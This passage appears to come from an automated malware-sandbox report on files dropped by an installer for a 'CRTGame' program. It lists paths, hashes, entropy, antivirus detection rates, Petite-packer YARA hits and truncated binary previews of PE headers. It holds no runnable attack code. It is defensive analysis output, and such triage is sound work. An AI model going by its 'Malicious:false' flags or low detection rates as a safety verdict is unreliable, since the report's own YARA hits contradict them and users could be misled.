                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5960
                                                                                                          Entropy (8bit):5.956401374574174
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                                          MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                                          SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                                          SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                                          SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):115712
                                                                                                          Entropy (8bit):6.401537154757194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):126478
                                                                                                          Entropy (8bit):6.268811819718352
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22542
                                                                                                          Entropy (8bit):5.5875455203930615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                          MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                          SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                          SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                          SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31936
                                                                                                          Entropy (8bit):6.6461204214578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                          MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                          SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                          SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                          SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8456
                                                                                                          Entropy (8bit):6.767152008521429
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                                          MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                                          SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                                          SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                                          SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13838
                                                                                                          Entropy (8bit):5.173769974589746
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                          MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                          SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                          SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                          SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1059
                                                                                                          Entropy (8bit):5.1208137218866945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                                          Malicious:false
                                                                                                          Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11532
                                                                                                          Entropy (8bit):7.219753259626605
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                                          MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                                          SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                                          SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                                          SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17472
                                                                                                          Entropy (8bit):7.524548435291935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                                          MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                                          SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                                          SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                                          SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):867854
                                                                                                          Entropy (8bit):4.9264497464202694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):197120
                                                                                                          Entropy (8bit):6.423554884287906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227328
                                                                                                          Entropy (8bit):6.641153481093122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):123406
                                                                                                          Entropy (8bit):6.263889638223575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                          MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                          SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                          SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                          SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26126
                                                                                                          Entropy (8bit):6.048294343792499
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):315918
                                                                                                          Entropy (8bit):6.5736483262229735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                                          MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                                          SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                                          SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                                          SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):266254
                                                                                                          Entropy (8bit):6.343813822604148
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                                                          MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                                                          SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                                                          SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                                                          SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):906766
                                                                                                          Entropy (8bit):6.450201653594769
                                                                                                          Encrypted:false
